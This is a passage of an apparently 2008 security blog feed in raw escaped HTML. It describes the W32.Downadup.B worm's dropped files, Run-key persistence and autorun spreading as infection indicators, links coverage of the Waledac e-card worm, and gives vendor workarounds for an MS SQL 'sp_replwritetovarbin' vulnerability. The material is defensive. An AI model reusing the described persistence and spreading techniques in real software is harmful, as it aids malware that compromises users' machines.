NAME].dll&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;%System%\[RANDOM FILE      NAME].dll&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;%Temp%\[RANDOM FILE NAME].dll&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;C:\Documents and Settings\All      Users\Application Data \[RANDOM FILE NAME].dll&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;You can also look for the following registry entries.&lt;/span&gt;&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\"dl"      = "0"&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\"dl"      = "0"&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\"ds"      = "0"&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\"ds"      = "0"&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;It creates the following registry entry too so that it runs every time Windows starts:    &lt;/span&gt;&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM NAME]" = "rundll32.exe "[RANDOM FILE NAME].dll", ydmmgvos"&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;You can check for the presence of following registry entry which enables the worm to spread rapidly over the network: &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\"TcpNumConnections" = "00FFFFFE"&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;The worm also copies itself to any accessible mapped drive as the following file:&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;%DriveLetter%\RECYCLER\S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d\[RANDOM FILE NAME].dll&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;%DriveLetter%\autorun.inf&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;Oh yes one more new feature added to this worm, it now queries a new domain to get the public IP address of the infected computer apart form the domains it was accessing earlier is:&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://www.whatsmyipaddress.com/"&gt;http://www.whatsmyipaddress.com&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;I hope that this post gave you all a brief idea, for detailed reading kindly visit the Symantec link at :&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&amp;amp;tabid=2"&gt;http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&amp;amp;tabid=2&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;&lt;b style=""&gt;&lt;u&gt;Reference:&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;ol&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-112203-2408-99&amp;amp;tabid=2"&gt;http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-112203-2408-99&amp;amp;tabid=2&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&amp;amp;tabid=2"&gt;http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&amp;amp;tabid=2&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://www.symantec.com/business/security_response/threatexplorer/index.jsp"&gt;http://www.symantec.com/business/security_response/threatexplorer/index.jsp&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://www.securityfocus.com/bid/31874/info"&gt;http://www.securityfocus.com/bid/31874/info&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;&lt;a href="http://wormsandexploits.blogspot.com/2008/11/new-worm-attack-nov-2008-exploting.html"&gt;http://wormsandexploits.blogspot.com/2008/11/new-worm-attack-nov-2008-exploting.html&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;               &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;   &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-2662182708662057256?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/2662182708662057256/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=2662182708662057256' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/2662182708662057256'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/2662182708662057256'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/yet-another-variant-of-w32downadup-just.html' title='Yet another variant of W32.Downadup Just before new year....... W32.Downadup.B'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-2832329364059978198</id><published>2008-12-30T03:06:00.001-08:00</published><updated>2008-12-31T00:44:35.157-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ecard virus'/><category scheme='http://www.blogger.com/atom/ns#' term='email ecard virus'/><title type='text'>Interesting article about ECard Virus...Must read</title><content type='html'>&amp;quot;......&lt;span class="body"&gt;First, I'll tell you a little bit about the worm. &lt;a href="http://www.symantec.com/en/th/enterprise/security_response/writeup.jsp?docid=2008-122308-1429-99" target="_blank"&gt;W32.Waledac&lt;/a&gt; is a worm that sends emails containing a link to an apparent Christmas e-card that you have received. However, when the link for the e-card in the email is visited, you receive a copy of the worm instead of a greeting card. The file name used by the worm is ecard.exe and the links are all Christmas related, such as:.......&amp;quot;&lt;/span&gt;&lt;br&gt;&lt;br&gt;This is what i got in SecurityFocus, read the full story here.....&lt;br&gt;&lt;br&gt;&lt;a href="http://www.securityfocus.com/blogs/1539"&gt;http://www.securityfocus.com/blogs/1539&lt;/a&gt;&lt;br&gt; &lt;br&gt;W&amp;amp;E&lt;br&gt;&lt;br&gt;&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-2832329364059978198?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/2832329364059978198/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=2832329364059978198' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/2832329364059978198'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/2832329364059978198'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/interesting-article-about-ecard.html' title='Interesting article about ECard Virus...Must read'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-8988257332797496689</id><published>2008-12-28T10:33:00.001-08:00</published><updated>2008-12-31T00:36:48.244-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CastleCops'/><category scheme='http://www.blogger.com/atom/ns#' term='castleCops Offline'/><category scheme='http://www.blogger.com/atom/ns#' term='CastleCops Down'/><title type='text'>CastleCops no more online....</title><content type='html'>The famous anti-malware website &lt;a href="http://www.castlecops.com"&gt;www.castlecops.com&lt;/a&gt; abruptly goes offline.&lt;br&gt;read the full story here&lt;br&gt;&lt;a href="http://it.slashdot.org/article.pl?sid=08%2F12%2F27%2F1624220&amp;amp;from=rss"&gt;http://it.slashdot.org/article.pl?sid=08%2F12%2F27%2F1624220&amp;amp;from=rss&lt;/a&gt;&lt;br&gt; &lt;br&gt;&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-8988257332797496689?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/8988257332797496689/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=8988257332797496689' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8988257332797496689'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8988257332797496689'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2008/12/castlecops-no-more-online.html' title='CastleCops no more online....'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-5925108898657823567</id><published>2008-12-23T02:07:00.001-08:00</published><updated>2008-12-31T00:46:48.146-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Remote Memory Corruption Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='MS SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='MSSQL Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Zero Day Ms SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='sp_replwritetovarbin Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='MS Sql Zero day'/><category scheme='http://www.blogger.com/atom/ns#' term='Ms Sql Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='&apos;sp_replwritetovarbin&apos; Bufferoverflow'/><category scheme='http://www.blogger.com/atom/ns#' term='sp_replwritetovarbin exploit code'/><category scheme='http://www.blogger.com/atom/ns#' term='DENY EXECUTE ON sp_replwritetovarbin TO PUBLIC'/><category scheme='http://www.blogger.com/atom/ns#' term='sp_replwritetovarbin'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL Server zero-day'/><category scheme='http://www.blogger.com/atom/ns#' term='ms sql exploits and vulnerabilities'/><category scheme='http://www.blogger.com/atom/ns#' term='MSSQL'/><title type='text'>New Zero day on Microsoft SQL Server Stored Procedure 'sp_replwritetovarbin'</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CDEEPAY%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;} @font-face 	{font-family:SymantecSans; 	panose-1:2 11 5 0 5 2 2 2 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:3 0 0 0 1 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:&amp;quot;&amp;quot;; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} pre 	{margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; 	font-size:10.0pt; 	font-family:&amp;quot;Courier New&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} span.title 	{mso-style-name:title;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:2008047604; 	mso-list-type:hybrid; 	mso-list-template-ids:-672390898 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;} @list l0:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	font-family:Symbol;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;span class="title"&gt;&lt;/span&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span class="title"&gt;MS SQL is having a Remote Memory Corruption Vulnerability on its stored procedure 'sp_replwritetovarbin' Microsoft has released a advisory on this (Microsoft Security Advisory (&lt;a href="http://www.microsoft.com/technet/security/advisory/961040.mspx"&gt;961040&lt;/a&gt;)&lt;/span&gt;&lt;span style=";font-family:SymantecSans;font-size:11;"  &gt;). &lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:SymantecSans;font-size:11;"  &gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;This could be exploited by sending a payload with specially crafted values which could result in a memory corruption, and then this could be exploited to execute arbitrary code with the privileges of the current user. But authentication is required to exploit this vulnerability, it is also exploitable via SQL injection, by using the authentication credentials of the vulnerable web application. A proof-of-concept is already been publicly available at places for this vulnerability.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Some workarounds as given by the vendor is as follows, Details can be found at the following link.&lt;/p&gt;  &lt;p class="MsoNormal"&gt; &lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;a style="color: rgb(0, 0, 0);" href="http://www.blogger.com/goog_1230020952379"&gt;&lt;span class="MsoHyperlink"&gt;V&lt;/span&gt;&lt;/a&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="text-decoration: none;color:#000000;" &gt;&lt;span style="color: rgb(0, 0, 0);"&gt;endor URL&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="font-size:11;"&gt;&lt;a href="http://www.microsoft.com/technet/security/advisory/961040.mspx"&gt;http://www.microsoft.com/technet/security/advisory/961040.mspx&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;•&lt;span style=""&gt;           &lt;/span&gt;Use one of the following procedures:&lt;/p&gt;  &lt;table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0"&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="padding: 0in;" valign="top"&gt;   &lt;p class="MsoNormal"&gt;•&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0in;"&gt;   &lt;p&gt;To deny access to the stored procedure, connect to SQL Server as a   sysadmin using osql.exe or sqlcmd.exe or through SQL Server Management Studio   and execute the following T-SQL script:&lt;/p&gt;   &lt;pre&gt;&lt;span style="background-color: rgb(255, 255, 51);"&gt;use master&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="background-color: rgb(255, 255, 51);"&gt;deny execute on sp_replwritetovarbin to public&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;&lt;td valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;    &lt;ul&gt;&lt;li&gt;&lt;span style="font-family:Symbol;"&gt;&lt;span style=""&gt;·&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;To deny access to the stored procedure using SQL Server administration:&lt;/li&gt;&lt;li&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0"&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="padding: 0in;" valign="top"&gt;   &lt;p class="MsoNormal"&gt;•&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0in;"&gt;   &lt;p&gt;For SQL Server 2000:&lt;/p&gt;   &lt;table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0"&gt;    &lt;tbody&gt;&lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;1.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Connect to SQL Server using Enterprise Manager as a sysadmin&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;2.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;From the SQL Server Enterprise Manager window, select the desired server&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;3.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Expand the databases&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;4.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Expand &lt;b&gt;Master&lt;/b&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;5.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Click &lt;b&gt;Extended Stored Procedures.&lt;/b&gt; A list of stored procedures     appears.&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;6.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;From the list of stored procedures, right-click &lt;b&gt;sp_replwritetovarbin&lt;/b&gt;     and select &lt;b&gt;Properties&lt;/b&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;7.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;In the Properties window, click &lt;b&gt;Permissions&lt;/b&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;8.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Under Users/Database Roles/Public, find &lt;b&gt;Public&lt;/b&gt;, then click the     box in the &lt;b&gt;EXEC&lt;/b&gt; column. The box turns into a red &lt;b&gt;X&lt;/b&gt;.&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;9.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Click &lt;b&gt;OK&lt;/b&gt; twice&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;   &lt;/tbody&gt;&lt;/table&gt;   &lt;p class="MsoNormal"&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="display: none;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0"&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="padding: 0in;" valign="top"&gt;   &lt;p class="MsoNormal"&gt;•&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0in;"&gt;   &lt;p&gt;For SQL Server 2005:&lt;/p&gt;   &lt;table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0"&gt;    &lt;tbody&gt;&lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;1.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Connect to SQL Server using SQL Server Management Studio as a sysadmin&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;2.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;From the Object Explorer window, select the desired server&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;3.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Expand the databases and the system databases&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;4.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Expand &lt;b&gt;Master&lt;/b&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;5.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Expand &lt;b&gt;Programmability &lt;/b&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;6.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Click &lt;b&gt;Extended Stored Procedures.&lt;/b&gt; A list of stored procedures     appears.&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;7.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;From the list of stored procedures, right-click &lt;b&gt;sp_replwritetovarbin&lt;/b&gt;     and select &lt;b&gt;Properties&lt;/b&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;8.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;In the Properties window, click &lt;b&gt;Permissions&lt;/b&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr style=""&gt;     &lt;td style="padding: 0in;" valign="top" nowrap="nowrap"&gt;     &lt;p style="text-align: right;" align="right"&gt;9.&lt;/p&gt;     &lt;/td&gt;     &lt;td style="padding: 0in;" valign="top"&gt;     &lt;p&gt;Click &lt;b&gt;Deny execution&lt;/b&gt; beside the desired user IDs and click &lt;b&gt;OK&lt;/b&gt;&lt;/p&gt;     &lt;/td&gt;    &lt;/tr&gt;   &lt;/tbody&gt;&lt;/table&gt;   &lt;p class="MsoNormal"&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;    &lt;p 